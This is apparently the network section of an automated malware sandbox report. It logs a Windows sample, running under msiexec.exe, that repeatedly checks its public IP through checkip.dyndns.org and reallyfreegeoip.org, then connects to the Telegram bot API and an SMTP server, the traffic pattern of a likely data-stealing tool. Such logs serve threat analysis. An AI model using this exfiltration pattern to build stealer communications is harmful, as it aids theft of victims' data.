                                            Oct 14, 2024 09:12:16.261271000 CEST49783443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:16.261286020 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.304733992 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.774678946 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.779863119 CEST49783443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:16.779894114 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.929192066 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.929439068 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.929531097 CEST49783443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:16.930063009 CEST49783443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:16.934576035 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.934622049 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.939408064 CEST8049788193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:16.939768076 CEST8049781193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:16.939889908 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.940207005 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.940207005 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:16.944979906 CEST8049788193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:17.414257050 CEST8049788193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:17.415906906 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:17.415941000 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:17.416023016 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:17.416277885 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:17.416289091 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:17.461117029 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:17.901920080 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:17.903697014 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:17.903727055 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.040998936 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.041251898 CEST44349794188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.041321993 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.041593075 CEST49794443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.044970989 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.045476913 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.050110102 CEST8049788193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:18.050188065 CEST4978880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.050287008 CEST8049800193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:18.050348043 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.050544977 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.055418015 CEST8049800193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:18.514950991 CEST8049800193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:18.516011953 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.516035080 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.516108990 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.516325951 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.516338110 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.570375919 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:18.988104105 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:18.989988089 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:18.990010023 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:19.118465900 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:19.118710995 CEST44349802188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:19.118848085 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:19.119079113 CEST49802443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:19.122463942 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:19.123595953 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:19.128007889 CEST8049800193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:19.128057957 CEST4980080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:19.128448009 CEST8049808193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:19.128521919 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:19.128623962 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:19.133357048 CEST8049808193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:19.622350931 CEST8049808193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:19.623522997 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:19.623552084 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:19.624001026 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:19.624214888 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:19.624228001 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:19.664123058 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.100596905 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.103559971 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.103575945 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.226279020 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.226506948 CEST44349812188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.226564884 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.226839066 CEST49812443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.229708910 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.230606079 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.235276937 CEST8049808193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:20.235347033 CEST4980880192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.235424995 CEST8049816193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:20.235493898 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.235567093 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:20.240483046 CEST8049816193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:20.709753990 CEST8049816193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:20.710860014 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.710906029 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.710995913 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.711425066 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:20.711461067 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:20.757869005 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:21.205307007 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:21.206782103 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:21.206825972 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:21.359824896 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:21.360049963 CEST44349821188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:21.360120058 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:21.360369921 CEST49821443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:21.387588024 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:21.393210888 CEST8049816193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:21.393274069 CEST4981680192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:21.395117998 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:21.395145893 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:21.395201921 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:21.395572901 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:21.395586967 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.052506924 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.052586079 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:22.054234028 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:22.054240942 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.054725885 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.066978931 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:22.111409903 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.311306953 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.311520100 CEST44349827149.154.167.220192.168.2.4
                                            Oct 14, 2024 09:12:22.311585903 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:22.313596964 CEST49827443192.168.2.4149.154.167.220
                                            Oct 14, 2024 09:12:28.828576088 CEST4976280192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:29.093158960 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:29.098120928 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:29.098208904 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:29.837857962 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:29.838051081 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:29.843002081 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.060738087 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.060990095 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.289165020 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.386837006 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.386914968 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.387809038 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.387928963 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.580526114 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.580962896 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.585810900 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.781115055 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.781133890 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.781146049 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.781152964 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:30.781254053 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.783412933 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:30.788316965 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.219680071 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.219809055 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.219896078 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.222852945 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.429858923 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.458869934 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.458944082 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.459331036 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.459464073 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.652228117 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.652529001 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.657577991 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.850452900 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:31.850883961 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:31.855761051 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.074440002 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.082768917 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.087707996 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.283174038 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.283409119 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.288336992 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.488338947 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.488759995 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.493623018 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.686764002 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.687603951 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.687603951 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.687771082 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.687771082 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.687793970 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.692622900 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692637920 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692650080 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692671061 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692682981 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692816973 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692877054 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692888975 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692900896 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.692912102 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.896795988 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.897504091 CEST49873587192.168.2.4213.165.67.118
                                            Oct 14, 2024 09:12:32.903305054 CEST58749873213.165.67.118192.168.2.4
                                            Oct 14, 2024 09:12:32.903412104 CEST49873587192.168.2.4213.165.67.118
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 14, 2024 09:12:05.972544909 CEST5687553192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:05.979734898 CEST53568751.1.1.1192.168.2.4
                                            Oct 14, 2024 09:12:07.096993923 CEST5385253192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:07.104625940 CEST53538521.1.1.1192.168.2.4
                                            Oct 14, 2024 09:12:10.959350109 CEST5563953192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:10.966128111 CEST53556391.1.1.1192.168.2.4
                                            Oct 14, 2024 09:12:11.982721090 CEST6331453192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:11.992209911 CEST53633141.1.1.1192.168.2.4
                                            Oct 14, 2024 09:12:21.387521029 CEST5337353192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:21.394571066 CEST53533731.1.1.1192.168.2.4
                                            Oct 14, 2024 09:12:29.085366964 CEST5679153192.168.2.41.1.1.1
                                            Oct 14, 2024 09:12:29.092536926 CEST53567911.1.1.1192.168.2.4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 14, 2024 09:12:05.972544909 CEST192.168.2.41.1.1.10x64f9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:07.096993923 CEST192.168.2.41.1.1.10x5455Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.959350109 CEST192.168.2.41.1.1.10xc1a1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:11.982721090 CEST192.168.2.41.1.1.10xda4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:21.387521029 CEST192.168.2.41.1.1.10x98bdStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:29.085366964 CEST192.168.2.41.1.1.10xd2eStandard query (0)smtp.ionos.esA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 14, 2024 09:12:05.979734898 CEST1.1.1.1192.168.2.40x64f9No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:07.104625940 CEST1.1.1.1192.168.2.40x5455No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:10.966128111 CEST1.1.1.1192.168.2.40xc1a1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:11.992209911 CEST1.1.1.1192.168.2.40xda4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:11.992209911 CEST1.1.1.1192.168.2.40xda4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:21.394571066 CEST1.1.1.1192.168.2.40x98bdNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:29.092536926 CEST1.1.1.1192.168.2.40xd2eNo error (0)smtp.ionos.es213.165.67.118A (IP address)IN (0x0001)false
                                            Oct 14, 2024 09:12:29.092536926 CEST1.1.1.1192.168.2.40xd2eNo error (0)smtp.ionos.es213.165.67.102A (IP address)IN (0x0001)false
                                            • drive.google.com
                                            • drive.usercontent.google.com
                                            • reallyfreegeoip.org
                                            • api.telegram.org
                                            • checkip.dyndns.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449744193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:10.978410959 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:11.444911003 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:11 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 4fe55711742fb2f777c1a0a3cac46164
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Oct 14, 2024 09:12:11.449043036 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Oct 14, 2024 09:12:11.559118032 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:11 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: aed5e4b4a7c86a1d3b60bf445733e6ef
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                            Oct 14, 2024 09:12:12.768369913 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Oct 14, 2024 09:12:12.878074884 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:12 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 73e4e7b40fa1402ce85dae0a559bd3db
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449762193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:13.518816948 CEST127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Oct 14, 2024 09:12:14.017910004 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:13 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 8f1a4049f30890d0dccf233d0aa916bb
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449770193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:14.657296896 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:15.151238918 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:15 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: d00591f341585d30aa12514aa8676e5c
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449781193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:15.784436941 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:16.258533001 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:16 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: dee6152f077bac4abf8d2acc89e29328
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449788193.122.130.0807824C:\Windows\SysWOW64\msiexec.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 09:12:16.940207005 CEST151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Oct 14, 2024 09:12:17.414257050 CEST320INHTTP/1.1 200 OK
                                            Date: Mon, 14 Oct 2024 07:12:17 GMT
                                            Content-Type: text/html
                                            Content-Length: 103
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 27571e27a3973c85d8cd0bbbc4122eaf
